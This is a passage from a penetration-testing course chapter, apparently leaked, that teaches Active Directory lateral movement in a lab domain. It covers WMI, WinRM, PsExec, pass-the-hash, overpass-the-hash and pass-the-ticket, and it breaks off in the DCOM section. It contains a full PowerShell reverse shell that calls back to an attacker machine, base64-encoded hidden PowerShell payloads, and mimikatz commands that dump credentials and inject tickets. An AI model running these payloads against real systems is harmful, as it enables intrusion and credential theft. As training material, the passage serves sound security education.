PEN-200
- Courses
- Penetration Testing with Kali Linux
PEN-200: 23. Lateral Movement in Active Directory | Leaked by hide01.ir
23. Lateral Movement in Active Directory
In this Learning Module, we will cover the following Learning Units:
- Active Directory Lateral Movement Techniques
- Active Directory Persistence
In previous Modules, we located high-value targets that could lead to an Active Directory compromise and found the workstations or servers they are logged in to. We gathered password hashes then recovered and leveraged existing tickets for Kerberos authentication.
Now, we will use lateral movement techniques to compromise the machines on which these high-value domain users are logged in.
A logical next step in our approach would be to crack any password hashes we have obtained and authenticate to a machine with clear text passwords to gain unauthorized access. However, password cracking takes time and may fail. In addition, Kerberos and NTLM do not use the clear text password directly, and native tools from Microsoft do not support authentication using the password hash.
In this Module, we will explore different lateral movement techniques that allow us to authenticate to a system and gain code execution using a user's hash or a Kerberos ticket.
23.1. Active Directory Lateral Movement Techniques
This Learning Unit covers the following Learning Objectives:
- Understand WMI, WinRS, and WinRM lateral movement techniques
- Abuse PsExec for lateral movement
- Learn about Pass The Hash and Overpass The Hash as lateral movement techniques
- Misuse DCOM to move laterally
Lateral Movement is a tactic consisting of various techniques aimed at gaining further access within the target network. As described in the MITRE Framework, these techniques may use the current valid account or reuse authentication material such as password hashes, Kerberos tickets, and application access tokens obtained from the previous attack stages.
In this Learning Unit, we are going to explore various techniques that involve both valid accounts and previously retrieved credentials.
Additionally, it's important to note that the knowledge we've gained about enumerating Active Directory domains remains relevant in the lateral movement attack phase, as we may have acquired access to previously undiscovered networks.
23.1.1. WMI and WinRM
The first lateral movement technique we are going to cover is based on Windows Management Instrumentation (WMI), which is an object-oriented feature that facilitates task automation.
WMI is capable of creating processes via the Create method from the Win32_Process class. It communicates through Remote Procedure Calls (RPC) over port 135 for remote access and uses a higher-range port (19152-65535) for session data.
To demonstrate this attack technique, we'll first briefly showcase the wmic utility, which has been recently deprecated, and then we'll discover how to conduct the same WMI attack via PowerShell.
To create a process on the remote target via WMI, we need the credentials of a member of the Administrators local group, which can also be a domain user. In the following examples, we are going to perform the attacks as the user jen, which is both a domain user and a member of the Local Administrator group for the target machines.
We already encountered UAC remote restrictions for non-domain joined machines in the Password Attacks Module. However, this kind of restriction does not apply to domain users, meaning that we can leverage full privileges while moving laterally with the techniques shown in this Learning Unit.
Historically, wmic has been abused for lateral movement via the command line by specifying the target IP after the /node: argument then the user after the /user: argument, and then the password after the /password: argument.
In this example, we'll instruct wmic to launch a calculator, "calc" instance with the process call create keywords. It is important to note, that the machine we are attacking is a server with the hostname Files04. We are attemping to move laterally from our current machine, to this new server.
We can test the command by connecting as jeff on CLIENT74.
C:\Users\jeff>wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 752;
ReturnValue = 0;
};
Listing 1 - Running the wmic utility to spawn a process on a remote system.
The WMI job returned the PID of the newly created process and a return value of "0", meaning that the process has been created successfully.
If we were logged in on that machine and monitoring Task Manager we would see the win32calc.exe process appear with jen as the user.
System processes and services always run in session 01 as part of session isolation, which was introduced in Windows Vista. Because the WMI Provider Host is running as a system service, the newly created processes through WMI are also spawned in session 0.
Translating this attack into PowerShell syntax requires a few extra details.
First, We need to create a PSCredential object that will store our session username and password.
To do that, we will first store the username and password in variables. Then, we will secure the password via the ConvertTo-SecureString cmdlet. Finally, we'll create a new PSCredential object with the username variable and secureString object.
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
Listing 2 - Creating the PSCredential object in PowerShell
Now that we have our PSCredential object, we need to create a Common Information Model (CIM) via the New-CimSession cmdlet.
To do that, we'll first specify DCOM as the protocol for the WMI session with the New-CimSessionOption cmdlet on the first line. On the second line, we'll create the new session, New-Cimsession against our target IP, using -ComputerName and supply the PSCredential object (-Credential $credential) along with the session options (-SessionOption $Options). Lastly, we'll define 'calc' as the payload to be executed by WMI.
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$command = 'calc';
Listing 3 - Creating a new CimSession
As a final step, we need to tie together all the arguments we configured previously by issuing the Invoke-CimMethod cmdlet and supplying Win32_Process to the ClassName and Create to the MethodName. To send the argument, we wrap them in @{CommandLine =$Command}.
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
Listing 4 - Invoking the WMI session through PowerShell
To simulate the technique, we can connect to CLIENT74 as jeff and insert the above code in a PowerShell prompt. (Not all the code is shown below.)
PS C:\Users\jeff> $username = 'jen';
...
PS C:\Users\jeff> Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
ProcessId ReturnValue PSComputerName
--------- ----------- --------------
3712 0 192.168.50.73
Listing 5 - Executing the WMI PowerShell payload.
Verifying the active processes on the target machine reveals that a new calculator process has been launched, confirming that our attack has succeeded.
To further improve our craft, let's replace the previous payload with a full reverse shell written in PowerShell.
First, we'll encode the PowerShell reverse shell so we don't need to escape any special characters when inserting it as a WMI payload.
The following Python code encodes the PowerShell reverse shell to base64 contained in the payload variable and then prints the result to standard output.
Reviewing the entire PowerShell payload is outside the scope of this Module.
We need to replace the highlighted IP and port with the ones of our attacker Kali machine.
import sys
import base64
payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()
print(cmd)
Listing 6 - Executing the WMI PowerShell payload.
Once we have saved the Python script, we can run it and retrieve the output to use later.
kali@kali:~$ python3 encode.py
powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAU...
OwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
Listing 7 - Running the base64 encoder Python script
After setting up a Netcat listener on port 443 on our Kali machine, we can move on to client74 and run the PowerShell WMI script with the newly generated encoded reverse shell payload.
PS C:\Users\jeff> $username = 'jen';
PS C:\Users\jeff> $password = 'Nexus123!';
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
PS C:\Users\jeff> $Options = New-CimSessionOption -Protocol DCOM
PS C:\Users\jeff> $Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
PS C:\Users\jeff> $Command = 'powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';
PS C:\Users\jeff> Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
ProcessId ReturnValue PSComputerName
--------- ----------- --------------
3948 0 192.168.50.73
Listing 8 - Executing the WMI payload with base64 reverse shell
From the output in Listing 8, we can conclude that the process creation has been successful, and switch to our listener for a final confirmation.
kali@kali:~$ nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.118.2] from (UNKNOWN) [192.168.50.73] 49855
PS C:\windows\system32\driverstore\filerepository\ntprint.inf_amd64_075615bee6f80a8d\amd64> hostname
FILES04
PS C:\windows\system32\driverstore\filerepository\ntprint.inf_amd64_075615bee6f80a8d\amd64> whoami
corp\jen
Listing 9 - Executing the WMI payload with base64 reverse shell
Nice! We indeed managed to move laterally and gain privileges as the jen domain user on an internal server by abusing WMI features.
As an alternative method to WMI for remote management, WinRM can be employed for remote host management. WinRM is the Microsoft version of the WS-Management protocol and it exchanges XML messages over HTTP and HTTPS. It uses TCP port 5986 for encrypted HTTPS traffic and port 5985 for plain HTTP.
In addition to its PowerShell implementation, which we'll cover later in this section, WinRM is implemented in numerous built-in utilities, such as winrs (Windows Remote Shell).
For WinRS to work, the domain user needs to be part of the Administrators or Remote Management Users group on the target host.
The winrs utility can be invoked by specifying the target host through the -r: argument and the username with -u: and password with -p. As a final argument, we want to specify the commands to be executed on the remote host. For example, we want to run the hostname and whoami commands to prove that they are running on the remote target.
Since winrs only works for domain users, we'll execute the whole command once we've logged in as jeff on CLIENT74 and provide jen's credentials as command arguments.
C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
FILES04
corp\jen
Listing 10 - Executing commands remotely via WinRS
The output confirms that we have indeed executed the commands remotely on FILES04.
To convert this technique into a full lateral movement scenario, we just need to replace the previous commands with the base64 encoded reverse-shell we wrote earlier.
C:\Users\jeff>winrs -r:files04 -u:jen -p:Nexus123! "powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5AD...
HUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
Listing 11 - Running the reverse-shell payload through WinRS
Once we run the above command after having set up a Netcat listener, we are welcomed with a reverse-shell from FILE04.
kali@kali:~$ nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.118.2] from (UNKNOWN) [192.168.50.73] 65107
PS C:\Users\jen> hostname
FILES04
PS C:\Users\jen> whoami
corp\jen
Listing 12 - Veriyfing the origin of the WinRS reverse-shell
PowerShell also has WinRM built-in capabilities called PowerShell remoting, which can be invoked via the New-PSSession cmdlet by providing the IP of the target host along with the credentials in a credential object format similar to what we did previously.
PS C:\Users\jeff> $username = 'jen';
PS C:\Users\jeff> $password = 'Nexus123!';
PS C:\Users\jeff> $secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
PS C:\Users\jeff> $credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
PS C:\Users\jeff> New-PSSession -ComputerName 192.168.50.73 -Credential $credential
Id Name ComputerName ComputerType State ConfigurationName Availability
-- ---- ------------ ------------ ----- ----------------- ------------
1 WinRM1 192.168.50.73 RemoteMachine Opened Microsoft.PowerShell Available
Listing 13 - Establishing a PowerShell Remote Session via WinRM
To interact with the session ID 1 we created, we can issue the Enter-PSSession cmdlet followed by the session ID.
PS C:\Users\jeff> Enter-PSSession 1
[192.168.50.73]: PS C:\Users\jen\Documents> whoami
corp\jen
[192.168.50.73]: PS C:\Users\jen\Documents> hostname
FILES04
Listing 14 - Inspecting the PowerShell Remoting session
Once more, we've proven that the session is originating from the target host through yet another lateral movement technique.
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Name (Click to sort ascending) | IP Address | |
|---|---|---|
Lateral Movement in Active Directory - WMI and WinRM - VM Group 1 Start Lateral Movement in Active Directory - WMI and WinRM - VM Group 1 with Kali browser access | ||
Lateral Movement in Active Directory - WMI and WinRM - VM Group 2 Start Lateral Movement in Active Directory - WMI and WinRM - VM Group 2 with Kali browser access |
23.1.2. PsExec
PsExec is a very versatile tool that is part of the SysInternals suite developed by Mark Russinovich. It's intended to replace telnet-like applications and provide remote execution of processes on other systems through an interactive console.
It is possible to misuse this tool for lateral movement, but three requisites must be met. First, the user that authenticates to the target machine needs to be part of the Administrators local group. Second, the ADMIN$ share must be available, and third, File and Printer Sharing has to be turned on. Luckily for us, the last two requirements are already met as they are the default settings on modern Windows Server systems.
To execute the command remotely, PsExec performs the following tasks:
- Writes psexesvc.exe into the C:\Windows directory
- Creates and spawns a service on the remote host
- Runs the requested program/command as a child process of psexesvc.exe
For this scenario, let's assume we have RDP access as the offsec local administrator on CLIENT74 as we already discovered its clear-text password on FILES04.
Even though PsExec is not installed by default on Windows, we can easily transfer it to our compromised machine. For the sake of usability, the whole SysInternals suite is available on CLIENT74. Once logged in as the offsec user on CLIENT74, we can run the 64-bit version of PsExec from C:\Tools\SysinternalsSuite.
To start an interactive session on the remote host, we need to invoke PsExec64.exe with the -i argument, followed by the target hostname prepended with two backslashes. We'll then specify the domain\username as corp\jen for the -u argument and Nexus123! as the password for the -p arguments. Finally, we will include the process we want to execute remotely. Here we will use the command shell.
PS C:\Tools\SysinternalsSuite> ./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
FILES04
C:\Windows\system32>whoami
corp\jen
Listing 15 - Obtaining an Interactive Shell on the Target System with PsExec
Listing 15 confirms that we obtained an interactive shell directly on the target system as the local administrator jen domain account, without involving our Kali machine to catch a reverse shell.
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Start VM Group 1 and repeat the steps discussed in this section. Which system folder (that will become a share name) needs to be shared in order for PsExec to connect remotely?
- Start VM Group 2 and connect as the offsec user on client74. Then try to use PsExec to move laterally to web04 in order to get the flag located on jen's desktop.
23.1.3. Pass the Hash
The Pass the Hash (PtH) technique allows an attacker to authenticate to a remote system or service using a user's NTLM hash instead of the user's plaintext password. Note that this will only work for servers or services using NTLM authentication, not for servers or services using Kerberos authentication. This lateral movement sub-technique is also mapped in the MITRE Framework under the Use Alternate Authentication Material general technique.
Many third-party tools and frameworks use PtH to allow users to both authenticate and obtain code execution, including:
- PsExec from Metasploit
- Passing-the-hash toolkit
- Impacket
The mechanics behind them are more or less the same in that the attacker connects to the victim using the Server Message Block (SMB) protocol and performs authentication using the NTLM hash.
Most tools that are built to abuse PtH can be leveraged to start a Windows service (for example, cmd.exe or an instance of PowerShell) and communicate with it using Named Pipes. This is done using the Service Control Manager API.
Unless we want to gain remote code execution, PtH does not need to create a Windows service for any other usage, such as accessing an SMB share.
Similar to PsExec, PtH has three prerequisites that must be met.
First, it requires an SMB connection through the firewall (commonly port 445), and second, the Windows File and Printer Sharing feature to be enabled. These requirements are common in internal enterprise environments.
This lateral movement technique also requires the admin share called ADMIN$ to be available. To establish a connection to this share, the attacker must present valid credentials with local administrative permissions. In other words, this type of lateral movement typically requires local administrative rights.
Note that PtH uses the NTLM hash legitimately. However, the vulnerability lies in the fact that we gained unauthorized access to the password hash of a local administrator.
To demonstrate this, we can use wmiexec from the Impacket suite from our local Kali machine against the local administrator account on FILES04. We are going to invoke the command by passing the local Administrator hash that we gathered in a previous Module and then specifying the username along with the target IP.
kali@kali:~$ /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
FILES04
C:\>whoami
files04\administrator
Listing 16 - Passing the hash using Impacket wmiexec
In this case, we used NTLM authentication to obtain code execution on the Windows 2022 server directly from Kali, armed only with the user's NTLM hash.
If the target was sitting behind a network that was only reachable through our initial compromised access, we could perform this very same attack by pivoting and proxying through the first host as learned in previous Modules.
This method works for Active Directory domain accounts and the built-in local administrator account. However, due to the 2014 security update, this technique can not be used to authenticate as any other local admin account.
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Start VM Group 1 and repeat the steps discussed in this section. Which TCP port needs to be enabled on the target machine in order for the pass the hash technique to work?
- Start VM Group 2 and try to execute the pass the hash technique to move laterally to web04 to get the flag located on the administrator's desktop.
23.1.4. Overpass the Hash
With overpass the hash, we can "over" abuse an NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT). Then we can use the TGT to obtain a Ticket Granting Service (TGS).
To demonstrate this, let's assume we have compromised a workstation (or server) that jen has authenticated to. We'll also assume that the machine is now caching their credentials (and therefore, their NTLM password hash).
To simulate this cached credential, we will log in to the Windows 10 CLIENT76 machine as jeff and run a process as jen, which prompts authentication.
The simplest way to do this is to right-click the Notepad icon on the desktop then shift left-click "show more options" on the popup, yielding the options in Figure 2.
From here, we enter jen as the username along with the associated password, which will launch Notepad in the context of that user. After successful authentication, jen's credentials will be cached on this machine.
We can validate this by opening an Administrative shell and using mimikatz with the sekurlsa::logonpasswords command. The command will dump the cached password hashes.
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
...
Authentication Id : 0 ; 1142030 (00000000:00116d0e)
Session : Interactive from 0
User Name : jen
Domain : CORP
Logon Server : DC1
Logon Time : 2/27/2023 7:43:20 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1124
msv :
[00000003] Primary
* Username : jen
* Domain : CORP
* NTLM : 369def79d8372408bf6e93364cc93075
* SHA1 : faf35992ad0df4fc418af543e5f4cb08210830d4
* DPAPI : ed6686fedb60840cd49b5286a7c08fa4
tspkg :
wdigest :
* Username : jen
* Domain : CORP
* Password : (null)
kerberos :
* Username : jen
* Domain : CORP.COM
* Password : (null)
ssp :
credman :
...
Listing 17 - Dumping password hash for 'jen'
This output shows jen's cached credentials under jen's own session. It includes the NTLM hash, which we will leverage to overpass the hash.
The essence of the overpass the hash lateral movement technique is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication. A simple way to do this is with the sekurlsa::pth command from Mimikatz.
The command requires a few arguments and creates a new PowerShell process in the context of jen. This new PowerShell prompt will allow us to obtain Kerberos tickets without performing NTLM authentication over the network, making this attack different than a traditional pass-the-hash.
As the first argument, we specify /user: and /domain:, setting them to jen and corp.com respectively. We'll specify the NTLM hash with /ntlm: and finally, use /run: to specify the process to create (in this case, PowerShell).
mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell
user : jen
domain : corp.com
program : powershell
impers. : no
NTLM : 369def79d8372408bf6e93364cc93075
| PID 8716
| TID 8348
| LSA Process is now R/W
| LUID 0 ; 16534348 (00000000:00fc4b4c)
\_ msv1_0 - data copy @ 000001F3D5C69330 : OK !
\_ kerberos - data copy @ 000001F3D5D366C8
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ *Password replace @ 000001F3D5C63B68 (32) -> null
Listing 18 - Creating a process with a different user's NTLM password hash
At this point, we have a new PowerShell session that allows us to execute commands as jen.
At this point, running the whoami command on the newly created PowerShell session would show jeff's identity instead of jen. While this could be confusing, this is the intended behavior of the whoami utility which only checks the current process's token and does not inspect any imported Kerberos tickets
Let's list the cached Kerberos tickets with klist.
PS C:\Windows\system32> klist
Current LogonId is 0:0x1583ae
Cached Tickets: (0)
Listing 19 - Listing Kerberos tickets
No Kerberos tickets have been cached, but this is expected since jen has not yet performed an interactive login. Let's generate a TGT by authenticating to a network share on the files04 server with net use.
PS C:\Windows\system32> net use \\files04
The command completed successfully.
Listing 20 - Mapping a network share on a remote server
The output indicates that the net use command was successful.
Now let's use the klist command to list the newly requested Kerberos tickets.
PS C:\Windows\system32> klist
Current LogonId is 0:0x17239e
Cached Tickets: (2)
#0> Client: jen @ CORP.COM
Server: krbtgt/CORP.COM @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 2/27/2023 5:27:28 (local)
End Time: 2/27/2023 15:27:28 (local)
Renew Time: 3/6/2023 5:27:28 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC1.corp.com
#1> Client: jen @ CORP.COM
Server: cifs/files04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 2/27/2023 5:27:28 (local)
End Time: 2/27/2023 15:27:28 (local)
Renew Time: 3/6/2023 5:27:28 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC1.corp.com
Listing 21 - Listing Kerberos tickets
The output has the Kerberos tickets, including the TGT and a TGS for the Common Internet File System (CIFS) service.
We know that ticket #0 is a TGT because the server is krbtgt.
We used net use arbitrarily in this example, but we could have used any command that requires domain permissions and would subsequently create a TGS.
We have now converted our NTLM hash into a Kerberos TGT, allowing us to use any tools that rely on Kerberos authentication (as opposed to NTLM). Here we will use the official PsExec application from Microsoft.
PsExec can run a command remotely but does not accept password hashes. Since we have generated Kerberos tickets and operate in the context of jen in the PowerShell session, we can reuse the TGT to obtain code execution on the files04 host.
Let's try that now, running .\PsExec.exe to launch cmd remotely on the files04 machine as jen.
PS C:\Windows\system32> cd C:\tools\SysinternalsSuite\
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\files04 cmd
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
corp\jen
C:\Windows\system32>hostname
FILES04
Listing 22- Opening remote connection using Kerberos
As evidenced by the output, we have successfully reused the Kerberos TGT to launch a command shell on the files04 server.
Excellent! We have successfully upgraded a cached NTLM password hash to a Kerberos TGT to gain remote code execution on behalf of another user.
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Start VM Group 1 and repeat the steps discussed in this section. Which command is used to inspect the current TGT available for the running user?
- Start VM Group 2 and try to execute the overpass the hash technique to move laterally to web04 to get the flag located on the Administrator's desktop. To do so, connect to CLIENT76 via RDP as the offsec user and use the NTLM hash obtained in a previous Module.
23.1.5. Pass the Ticket
In the previous section, we used the overpass the hash technique (along with the captured NTLM hash) to acquire a Kerberos TGT, allowing us to authenticate using Kerberos. We can only use the TGT on the machine it was created for, but the TGS potentially offers more flexibility.
The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service. In addition, if the service tickets belong to the current user, then no administrative privileges are required.
In this scenario, we are going to abuse an already existing session of the user dave. The dave user has privileged access to the backup folder located on WEB04 whereas our logged-in user jen does not.
To demonstrate the attack angle, we are going to extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our own session. This will allow us to access the restricted folder.
Let's first log in as jen to CLIENT76 and verify that we are unable to access the resource on WEB04. To do so, we'll try to list the content of the \\web04\backup folder from an administrative PowerShell command line session.
PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.
At line:1 char:1
+ ls \\web04\backup
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\web04\backup:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Listing 23 - Verifying that the user jen has no access to the shared folder
Confirming that jen has no access to the restricted folder, we can now launch mimikatz, enable debug privileges, and export all the TGT/TGS from memory with the sekurlsa::tickets /export command.
mimikatz #privilege::debug
Privilege '20' OK
mimikatz #sekurlsa::tickets /export
Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session : Batch from 0
User Name : dave
Domain : CORP
Logon Server : DC1
Logon Time : 9/14/2022 6:24:17 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1103
* Username : dave
* Domain : CORP.COM
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
Target Name (02) : krbtgt ; CORP ; @ CORP.COM
Client Name (01) : dave ; @ CORP.COM ( CORP )
Flags 40c10000 : name_canonicalize ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1f1626]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi !
...
Listing 24 - Exporting Kerberos TGT/TGS to disk
The above command parsed the LSASS process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format.
Inspecting the generated tickets indicates that dave had initiated a session. We can try to inject one of their tickets inside jen's sessions.
We can verify newly generated tickets with dir, filtering out on the kirbi extension.
PS C:\Tools> dir *.kirbi
Directory: C:\Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/14/2022 6:24 AM 1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;12bd0]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a---- 9/14/2022 6:24 AM 1561 [0;1c6860]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;1c6860]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a---- 9/14/2022 6:24 AM 1561 [0;1c7bcc]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;1c7bcc]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a---- 9/14/2022 6:24 AM 1561 [0;1c933d]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;1c933d]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a---- 9/14/2022 6:24 AM 1561 [0;1ca6c2]-0-0-40810000-dave@cifs-web04.kirbi
-a---- 9/14/2022 6:24 AM 1505 [0;1ca6c2]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
...
Listing 25 - Exporting Kerberos TGT/TGS to disk
As many tickets have been generated, we can just pick any TGS ticket in the dave@cifs-web04.kirbi format and inject it through mimikatz via the kerberos::ptt command.
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
* File: '[0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi': OK
Listing 26 - Injecting the selected TGS into process memory.
No errors have been thrown, meaning that we should expect the ticket in our session when running klist.
PS C:\Tools> klist
Current LogonId is 0:0x13bca7
Cached Tickets: (1)
#0> Client: dave @ CORP.COM
Server: cifs/web04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
Start Time: 9/14/2022 5:31:32 (local)
End Time: 9/14/2022 15:31:13 (local)
Renew Time: 9/21/2022 5:31:13 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
Listing 27 - Inspecting the injected ticket in memory
We notice that the dave ticket has been successfully imported in our own session for the jen user.
Let's confirm we have been granted access to the restricted shared folder.
PS C:\Tools> ls \\web04\backup
Directory: \\web04\backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2022 2:52 AM 0 backup_schemata.txt
Listing 28 - Accessing the shared folder through the injected ticket
Awesome! We managed to successfully access the folder by impersonating dave's identity after injecting its authentication token into our user's process.
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Labs
- Start VM Group 1 and try to execute the pass the ticket technique as illustrated in this section by first logging in to CLIENT76 as jen. Try to move laterally to web04 to get the flag located in the shared folder.
23.1.6. DCOM
In this section, we will inspect a fairly recent lateral movement technique that exploits the Distributed Component Object Model (DCOM) and learn how it can be abused for lateral movement.
The Microsoft Component Object Model (COM) is a system for creating software components that interact with each other. While COM was created for either same-process or cross-process interaction, it was extended to Distributed Component Object Model (DCOM) for interaction between multiple computers over a network.
Both COM and DCOM are very old technologies dating back to the very first editions of Windows. Interaction with DCOM is performed over RPC on TCP port 135 and local administrator access is required to call the DCOM Service Control Manager, which is essentially an API.
Cybereason documented a collection of various DCOM lateral movement techniques, including one discovered by Matt Nelson, which we are covering in this section.
The discovered DCOM lateral movement technique is based on the Microsoft Management Console (MMC) COM application that is employed for scripted automation of Windows systems.
The MMC Application Class allows the creation of Application Objects, which expose the ExecuteShellCommand method under the Document.ActiveView property. As its name suggests, this method allows the execution of any shell command as long as the authenticated user is authorized, which is the default for local administrators.
We are going to demonstrate this lateral movement attack as the jen user logged in from the already compromised Windows 11 CLIENT74 host.
From an elevated PowerShell prompt, we can instantiate a remote MMC 2.0 application by specifying the target IP of FILES04 as the second argument of the GetTypeFromProgID method.
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
Listing 29 - Remotely Instantiating the MMC Application object
